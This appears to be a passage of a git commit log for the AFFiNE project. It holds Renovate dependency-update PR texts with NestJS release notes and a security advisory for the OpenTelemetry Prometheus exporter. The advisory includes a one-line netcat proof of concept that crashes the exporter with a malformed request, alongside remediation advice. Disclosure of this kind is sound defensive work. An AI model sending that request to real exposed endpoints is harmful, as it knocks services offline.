fix(core): use strict null check for SSE message id
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- `microservices`
- [#&#8203;16850](https://redirect.github.com/nestjs/nest/pull/16850)
fix(microservices): ServerRMQ crashes at boot when
[@&#8203;MessagePattern](https://redirect.github.com/MessagePattern)(undefined)
is combined with wildcards: true
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- `common`
- [#&#8203;16845](https://redirect.github.com/nestjs/nest/pull/16845)
fix(common): accept zero timestamp in parse date pipe
([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- `platform-socket.io`
- [#&#8203;16742](https://redirect.github.com/nestjs/nest/pull/16742)
fix(socket.io): Deduplicate disconnect listener in bindMessageHandlers
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))

##### Enhancements

- `microservices`
- [#&#8203;16676](https://redirect.github.com/nestjs/nest/pull/16676)
feat(microservices): add return buffers option for binary data
([@&#8203;Forceres](https://redirect.github.com/Forceres))
- [#&#8203;16826](https://redirect.github.com/nestjs/nest/pull/16826)
feat(microservices): handle rmq blocked/unblocked connection events
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- `common`
- [#&#8203;16902](https://redirect.github.com/nestjs/nest/pull/16902)
fix(common): filetype validator buffer message
([@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni))
- `platform-express`
- [#&#8203;16844](https://redirect.github.com/nestjs/nest/pull/16844)
feat(platform-express): add defParamCharset to MulterOptions
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

##### Dependencies

- `platform-ws`
- [#&#8203;16941](https://redirect.github.com/nestjs/nest/pull/16941)
chore(deps): bump ws from 8.20.0 to 8.20.1
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 13

- Ali Hassan
([@&#8203;thisalihassan](https://redirect.github.com/thisalihassan))
- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Dmytro Khyzhniak
([@&#8203;lavieennoir](https://redirect.github.com/lavieennoir))
- Harsh Rathod
([@&#8203;harshrathod50](https://redirect.github.com/harshrathod50))
- IlyaCredo ([@&#8203;Forceres](https://redirect.github.com/Forceres))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Mysh3ll ([@&#8203;Mysh3ll](https://redirect.github.com/Mysh3ll))
- [@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer)
- [@&#8203;QusaiAlbonni](https://redirect.github.com/QusaiAlbonni)
- [@&#8203;jkalberer](https://redirect.github.com/jkalberer)
- [@&#8203;pazaderey](https://redirect.github.com/pazaderey)
- fru1tworld
([@&#8203;fru1tworld](https://redirect.github.com/fru1tworld))
- starnayuta
([@&#8203;starnayuta](https://redirect.github.com/starnayuta))

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/schedule (@&#8203;nestjs/schedule)</summary>

###
[`v6.1.3`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.3)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.2...6.1.3)

#### What's Changed

- feat(cron): add initialDelay option to defer first job execution by
[@&#8203;kyungseopk1m](https://redirect.github.com/kyungseopk1m) in
[#&#8203;2251](https://redirect.github.com/nestjs/schedule/pull/2251)

**Full Changelog**:
<https://github.com/nestjs/schedule/compare/6.1.2...6.1.3>

###
[`v6.1.2`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.2)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.1...6.1.2)

- Merge pull request
[#&#8203;2247](https://redirect.github.com/nestjs/schedule/issues/2247)
from kyungseopk1m/feat/cron-initial-delay
([`a57ce2c`](https://redirect.github.com/nestjs/schedule/commit/a57ce2c))
- chore(deps): update dependency prettier to v3.8.3
([#&#8203;2248](https://redirect.github.com/nestjs/schedule/issues/2248))
([`bb3490d`](https://redirect.github.com/nestjs/schedule/commit/bb3490d))
- feat(cron): add initialDelay option to defer first job execution
([`1c5677f`](https://redirect.github.com/nestjs/schedule/commit/1c5677f))
- Merge pull request
[#&#8203;2245](https://redirect.github.com/nestjs/schedule/issues/2245)
from nestjs/renovate/nest-monorepo
([`59046bd`](https://redirect.github.com/nestjs/schedule/commit/59046bd))
- Merge pull request
[#&#8203;2246](https://redirect.github.com/nestjs/schedule/issues/2246)
from nestjs/renovate/oxlint-monorepo
([`be4eee3`](https://redirect.github.com/nestjs/schedule/commit/be4eee3))
- chore(deps): update dependency oxlint to v1.60.0
([`32a9ce2`](https://redirect.github.com/nestjs/schedule/commit/32a9ce2))
- chore(deps): update nest monorepo to v11.1.19
([`7d3844f`](https://redirect.github.com/nestjs/schedule/commit/7d3844f))
- chore: migrate to oxlint, vitest, ts6
([`29de71b`](https://redirect.github.com/nestjs/schedule/commit/29de71b))
- chore(deps): update dependency globals to v17.5.0
([#&#8203;2244](https://redirect.github.com/nestjs/schedule/issues/2244))
([`6c62cca`](https://redirect.github.com/nestjs/schedule/commit/6c62cca))
- chore(deps): update dependency sinon to v21.1.2
([#&#8203;2243](https://redirect.github.com/nestjs/schedule/issues/2243))
([`ee3b31a`](https://redirect.github.com/nestjs/schedule/commit/ee3b31a))
- chore(deps): update dependency sinon to v21.1.1
([#&#8203;2241](https://redirect.github.com/nestjs/schedule/issues/2241))
([`eba9799`](https://redirect.github.com/nestjs/schedule/commit/eba9799))
- Merge pull request
[#&#8203;2242](https://redirect.github.com/nestjs/schedule/issues/2242)
from nestjs/renovate/prettier-3.x
([`c3ad0f7`](https://redirect.github.com/nestjs/schedule/commit/c3ad0f7))
- chore(deps): update dependency prettier to v3.8.2
([`798e2a9`](https://redirect.github.com/nestjs/schedule/commit/798e2a9))
- Merge pull request
[#&#8203;2199](https://redirect.github.com/nestjs/schedule/issues/2199)
from nestjs/renovate/cimg-node-24.x
([`a05354a`](https://redirect.github.com/nestjs/schedule/commit/a05354a))
- chore(deps): update dependency typescript-eslint to v8.58.1
([#&#8203;2240](https://redirect.github.com/nestjs/schedule/issues/2240))
([`0367ac1`](https://redirect.github.com/nestjs/schedule/commit/0367ac1))
- chore(deps): update dependency eslint to v10.2.0
([#&#8203;2239](https://redirect.github.com/nestjs/schedule/issues/2239))
([`fa93e06`](https://redirect.github.com/nestjs/schedule/commit/fa93e06))
- chore(deps): update nest monorepo to v11.1.18
([#&#8203;2238](https://redirect.github.com/nestjs/schedule/issues/2238))
([`8cd4c02`](https://redirect.github.com/nestjs/schedule/commit/8cd4c02))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.2
([#&#8203;2237](https://redirect.github.com/nestjs/schedule/issues/2237))
([`01482df`](https://redirect.github.com/nestjs/schedule/commit/01482df))
- chore(deps): update dependency
[@&#8203;types/sinon](https://redirect.github.com/types/sinon) to
v21.0.1
([#&#8203;2236](https://redirect.github.com/nestjs/schedule/issues/2236))
([`f05b5bd`](https://redirect.github.com/nestjs/schedule/commit/f05b5bd))
- chore(deps): update dependency ts-jest to v29.4.9
([#&#8203;2235](https://redirect.github.com/nestjs/schedule/issues/2235))
([`af545e6`](https://redirect.github.com/nestjs/schedule/commit/af545e6))
- chore(deps): update dependency typescript-eslint to v8.58.0
([#&#8203;2233](https://redirect.github.com/nestjs/schedule/issues/2233))
([`4dad22a`](https://redirect.github.com/nestjs/schedule/commit/4dad22a))
- chore(deps): update node.js to v24.14.1
([`28db9bc`](https://redirect.github.com/nestjs/schedule/commit/28db9bc))
- chore(deps): update dependency eslint to v10.1.0
([#&#8203;2232](https://redirect.github.com/nestjs/schedule/issues/2232))
([`413f390`](https://redirect.github.com/nestjs/schedule/commit/413f390))
- chore(deps): update nest monorepo to v11.1.17
([#&#8203;2230](https://redirect.github.com/nestjs/schedule/issues/2230))
([`46c2bc5`](https://redirect.github.com/nestjs/schedule/commit/46c2bc5))
- chore(deps): update dependency typescript-eslint to v8.57.1
([#&#8203;2231](https://redirect.github.com/nestjs/schedule/issues/2231))
([`8fd063b`](https://redirect.github.com/nestjs/schedule/commit/8fd063b))
- chore(deps): update dependency sinon to v21.0.3
([#&#8203;2229](https://redirect.github.com/nestjs/schedule/issues/2229))
([`1671ad9`](https://redirect.github.com/nestjs/schedule/commit/1671ad9))
- chore(deps): update commitlint monorepo to v20.5.0
([#&#8203;2228](https://redirect.github.com/nestjs/schedule/issues/2228))
([`2ecd2f1`](https://redirect.github.com/nestjs/schedule/commit/2ecd2f1))
- chore(deps): update dependency lint-staged to v16.4.0
([#&#8203;2227](https://redirect.github.com/nestjs/schedule/issues/2227))
([`aa0de01`](https://redirect.github.com/nestjs/schedule/commit/aa0de01))
- chore(deps): update commitlint monorepo to v20.4.4
([#&#8203;2226](https://redirect.github.com/nestjs/schedule/issues/2226))
([`75034fe`](https://redirect.github.com/nestjs/schedule/commit/75034fe))
- chore(deps): update dependency lint-staged to v16.3.3
([#&#8203;2225](https://redirect.github.com/nestjs/schedule/issues/2225))
([`f1c7d31`](https://redirect.github.com/nestjs/schedule/commit/f1c7d31))
- chore(deps): update dependency jest to v30.3.0
([#&#8203;2224](https://redirect.github.com/nestjs/schedule/issues/2224))
([`1a208d4`](https://redirect.github.com/nestjs/schedule/commit/1a208d4))
- chore(deps): update dependency typescript-eslint to v8.57.0
([#&#8203;2223](https://redirect.github.com/nestjs/schedule/issues/2223))
([`60dd2c9`](https://redirect.github.com/nestjs/schedule/commit/60dd2c9))
- chore(deps): update dependency eslint to v10.0.3
([#&#8203;2221](https://redirect.github.com/nestjs/schedule/issues/2221))
([`791b6ba`](https://redirect.github.com/nestjs/schedule/commit/791b6ba))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.5
([#&#8203;2220](https://redirect.github.com/nestjs/schedule/issues/2220))
([`0da1ca7`](https://redirect.github.com/nestjs/schedule/commit/0da1ca7))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.12.0
([#&#8203;2219](https://redirect.github.com/nestjs/schedule/issues/2219))
([`934a93e`](https://redirect.github.com/nestjs/schedule/commit/934a93e))
- chore(deps): update nest monorepo to v11.1.16
([#&#8203;2218](https://redirect.github.com/nestjs/schedule/issues/2218))
([`5f44e9b`](https://redirect.github.com/nestjs/schedule/commit/5f44e9b))
- chore(deps): update dependency sinon to v21.0.2
([#&#8203;2217](https://redirect.github.com/nestjs/schedule/issues/2217))
([`b807746`](https://redirect.github.com/nestjs/schedule/commit/b807746))
- chore(deps): update dependency lint-staged to v16.3.2
([#&#8203;2216](https://redirect.github.com/nestjs/schedule/issues/2216))
([`4ca32bd`](https://redirect.github.com/nestjs/schedule/commit/4ca32bd))
- chore(deps): update commitlint monorepo to v20.4.3
([#&#8203;2215](https://redirect.github.com/nestjs/schedule/issues/2215))
([`d3ceb76`](https://redirect.github.com/nestjs/schedule/commit/d3ceb76))
- chore(deps): update nest monorepo to v11.1.15
([#&#8203;2214](https://redirect.github.com/nestjs/schedule/issues/2214))
([`b084ffc`](https://redirect.github.com/nestjs/schedule/commit/b084ffc))
- chore(deps): update dependency lint-staged to v16.3.1
([#&#8203;2213](https://redirect.github.com/nestjs/schedule/issues/2213))
([`8a201b2`](https://redirect.github.com/nestjs/schedule/commit/8a201b2))
- chore(deps): update dependency globals to v17.4.0
([#&#8203;2212](https://redirect.github.com/nestjs/schedule/issues/2212))
([`6f61793`](https://redirect.github.com/nestjs/schedule/commit/6f61793))
- chore(deps): update dependency lint-staged to v16.3.0
([#&#8203;2211](https://redirect.github.com/nestjs/schedule/issues/2211))
([`aa9213a`](https://redirect.github.com/nestjs/schedule/commit/aa9213a))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to v24.11.0
([#&#8203;2210](https://redirect.github.com/nestjs/schedule/issues/2210))
([`c70b928`](https://redirect.github.com/nestjs/schedule/commit/c70b928))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.15
([#&#8203;2209](https://redirect.github.com/nestjs/schedule/issues/2209))
([`0f596b9`](https://redirect.github.com/nestjs/schedule/commit/0f596b9))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.14
([#&#8203;2208](https://redirect.github.com/nestjs/schedule/issues/2208))
([`dac8cca`](https://redirect.github.com/nestjs/schedule/commit/dac8cca))
- chore(deps): update dependency eslint to v10.0.2
([#&#8203;2207](https://redirect.github.com/nestjs/schedule/issues/2207))
([`abe6fce`](https://redirect.github.com/nestjs/schedule/commit/abe6fce))
- chore(deps): update dependency
[@&#8203;eslint/eslintrc](https://redirect.github.com/eslint/eslintrc)
to v3.3.4
([#&#8203;2206](https://redirect.github.com/nestjs/schedule/issues/2206))
([`cb32a40`](https://redirect.github.com/nestjs/schedule/commit/cb32a40))
- chore(deps): update dependency typescript-eslint to v8.56.1
([#&#8203;2205](https://redirect.github.com/nestjs/schedule/issues/2205))
([`88e1e6c`](https://redirect.github.com/nestjs/schedule/commit/88e1e6c))
- chore(deps): update dependency eslint to v10.0.1
([#&#8203;2204](https://redirect.github.com/nestjs/schedule/issues/2204))
([`55e5406`](https://redirect.github.com/nestjs/schedule/commit/55e5406))
- chore(deps): update commitlint monorepo to v20.4.2
([#&#8203;2203](https://redirect.github.com/nestjs/schedule/issues/2203))
([`4e55d62`](https://redirect.github.com/nestjs/schedule/commit/4e55d62))
- chore(deps): update nest monorepo to v11.1.14
([#&#8203;2202](https://redirect.github.com/nestjs/schedule/issues/2202))
([`d23ea1a`](https://redirect.github.com/nestjs/schedule/commit/d23ea1a))
- chore(deps): update eslint monorepo to v10
([#&#8203;2195](https://redirect.github.com/nestjs/schedule/issues/2195))
([`c2fcbc3`](https://redirect.github.com/nestjs/schedule/commit/c2fcbc3))
- chore(deps): update dependency typescript-eslint to v8.56.0
([#&#8203;2201](https://redirect.github.com/nestjs/schedule/issues/2201))
([`a93ebc4`](https://redirect.github.com/nestjs/schedule/commit/a93ebc4))
- chore(deps): update dependency rimraf to v6.1.3
([#&#8203;2200](https://redirect.github.com/nestjs/schedule/issues/2200))
([`1906e80`](https://redirect.github.com/nestjs/schedule/commit/1906e80))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.13
([#&#8203;2198](https://redirect.github.com/nestjs/schedule/issues/2198))
([`244cb84`](https://redirect.github.com/nestjs/schedule/commit/244cb84))
- chore(deps): update dependency typescript-eslint to v8.55.0
([#&#8203;2197](https://redirect.github.com/nestjs/schedule/issues/2197))
([`6b00083`](https://redirect.github.com/nestjs/schedule/commit/6b00083))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.12
([#&#8203;2196](https://redirect.github.com/nestjs/schedule/issues/2196))
([`b310c95`](https://redirect.github.com/nestjs/schedule/commit/b310c95))
- chore(deps): update dependency
[@&#8203;types/node](https://redirect.github.com/types/node) to
v24.10.11
([#&#8203;2194](https://redirect.github.com/nestjs/schedule/issues/2194))
([`d05dca5`](https://redirect.github.com/nestjs/schedule/commit/d05dca5))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.2`](https://redirect.github.com/nestjs/swagger/compare/11.4.1...b0a35f3b20bedc6e6756f476cee182700a199b6e)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.1...11.4.2)

###
[`v11.4.1`](https://redirect.github.com/nestjs/swagger/compare/11.4.0...14bd8f58d6011a1be03e266e39e472be0d4d3795)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.0...11.4.1)

###
[`v11.4.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.2...11.4.0)

#### 11.4.0 (2026-04-22)

##### Features

- [#&#8203;3868](https://redirect.github.com/nestjs/swagger/pull/3868)
feat(plugin): auto-mark optional
[@&#8203;Query](https://redirect.github.com/Query) parameters as
required: false
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3725](https://redirect.github.com/nestjs/swagger/pull/3725)
feat(swagger): add OpenAPI 3.2 hierarchical tags support
([@&#8203;apt-bh](https://redirect.github.com/apt-bh))

##### Bug fixes

- [#&#8203;3874](https://redirect.github.com/nestjs/swagger/pull/3874)
fix(document-builder): accept multi-digit OpenAPI version segments
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3873](https://redirect.github.com/nestjs/swagger/pull/3873)
fix(plugin): strip regex delimiters and flags from
[@&#8203;Matches](https://redirect.github.com/Matches) patterns
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3870](https://redirect.github.com/nestjs/swagger/pull/3870)
fix(decorators): forward all OpenAPI parameter fields in
[@&#8203;ApiHeader](https://redirect.github.com/ApiHeader)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3872](https://redirect.github.com/nestjs/swagger/pull/3872)
fix(plugin): emit [@&#8203;throws](https://redirect.github.com/throws)
descriptions as proper string literals
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3782](https://redirect.github.com/nestjs/swagger/pull/3782)
fix(schema): preserve example metadata for non-body params with named
types ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3761](https://redirect.github.com/nestjs/swagger/pull/3761)
fix(plugin): support boolean literal types and boolean enum values
([@&#8203;lucreiss](https://redirect.github.com/lucreiss))

##### Enhancements

- [#&#8203;3865](https://redirect.github.com/nestjs/swagger/pull/3865)
feat(schema-object-factory): include class name chain in circular
dependency errors
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Committers: 4

- Lu R A ([@&#8203;lucreiss](https://redirect.github.com/lucreiss))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [@&#8203;apt-bh](https://redirect.github.com/apt-bh)

###
[`v11.3.2`](https://redirect.github.com/nestjs/swagger/compare/11.3.1...b16a1e19a8b7161e13c01c636acf3a187eabbd06)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.1...11.3.2)

###
[`v11.3.1`](https://redirect.github.com/nestjs/swagger/compare/11.3.0...93744af0bb923daeebcc2b674bc7957d778d3953)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.0...11.3.1)

###
[`v11.3.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.3.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.2.7...11.3.0)

#### 11.3.0 (2026-04-15)

##### Bug fixes

- [#&#8203;3826](https://redirect.github.com/nestjs/swagger/pull/3826)
fix: support nullable field in
[@&#8203;ApiResponse](https://redirect.github.com/ApiResponse) decorator
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3784](https://redirect.github.com/nestjs/swagger/pull/3784)
fix(schema): include type field when nullable is used with allOf
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3774](https://redirect.github.com/nestjs/swagger/pull/3774)
fix enum issue
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- [#&#8203;3798](https://redirect.github.com/nestjs/swagger/pull/3798)
fix(plugin): normalize workspace package import paths in metadata
generator ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3821](https://redirect.github.com/nestjs/swagger/pull/3821)
fix(plugin): handle same-file type references in SWC readonly metadata
generation ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3822](https://redirect.github.com/nestjs/swagger/pull/3822)
fix(type-helpers): eagerly apply plugin metadata properties in mapped
type helpers
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3840](https://redirect.github.com/nestjs/swagger/pull/3840)
fix: use child class type when re-declaring an inherited
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Enhancements

- [#&#8203;3449](https://redirect.github.com/nestjs/swagger/pull/3449)
feat(api-header): add example property to ApiHeader decorator
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- [#&#8203;3787](https://redirect.github.com/nestjs/swagger/pull/3787)
feat(decorators): support RegExp instances in
[@&#8203;ApiProperty](https://redirect.github.com/ApiProperty)({ pattern
}) ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- [#&#8203;3699](https://redirect.github.com/nestjs/swagger/pull/3699)
feat(api-body): add support for encoding in ApiBody decorator
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
- [#&#8203;3824](https://redirect.github.com/nestjs/swagger/pull/3824)
feat: support async patchDocumentOnRequest hook
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3834](https://redirect.github.com/nestjs/swagger/pull/3834)
feat: expose generateSchema utility for programmatic schema access
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3836](https://redirect.github.com/nestjs/swagger/pull/3836)
feat(plugin): add autoFillEnumName option to suppress duplicate enum
schemas
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3837](https://redirect.github.com/nestjs/swagger/pull/3837)
feat: merge descriptions when multiple decorators share the same HTTP
status code
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3839](https://redirect.github.com/nestjs/swagger/pull/3839)
feat: add excludeDynamicDefaults option to strip runtime-evaluated
schema defaults
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3841](https://redirect.github.com/nestjs/swagger/pull/3841)
feat: add DeepPartialType mapped-type helper for recursive optional
properties
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Dependencies

- [#&#8203;3850](https://redirect.github.com/nestjs/swagger/pull/3850)
fix(deps): update dependency swagger-ui-dist to v5.32.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 7

- JongHun Lim
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Rajasekar Janakiraman
([@&#8203;rajasekar33](https://redirect.github.com/rajasekar33))
- Supun Geethanjana Jayasinghe
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- Temrjan ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- Vito Macchia
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
-
[@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNTYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 01:25:23 +08:00
DarkSky 659072183c chore: bump deps 2026-05-13 22:26:02 +08:00
renovate[bot] f19a922793 chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
* you use `@opentelemetry/auto-instrumentations-node` via `--require
@&#8203;opentelemetry/auto-instrumentations-node/register`/`--import
@&#8203;opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @&#8203;opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/sdk-node)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
